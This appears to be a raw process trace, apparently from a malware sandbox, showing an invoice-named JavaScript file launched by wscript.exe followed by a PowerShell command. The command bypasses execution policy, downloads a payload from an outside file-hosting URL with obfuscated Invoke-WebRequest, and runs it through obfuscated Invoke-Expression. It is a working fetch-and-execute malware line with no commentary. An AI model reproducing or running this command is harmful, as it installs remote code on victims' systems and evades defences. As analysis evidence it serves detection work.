wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\invoice#91273.js
3048powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eP Bypass -c (I'w'r('https://529f38d0-3744-4286-b484-be860d475d25.usrfiles.com/ugd/529f38_e56d20a1e232483c9f77edcde4b6c7a6.txt') -useB) | .('{1}{0}'-f'eX','I') | ping 127.0.0.1
2276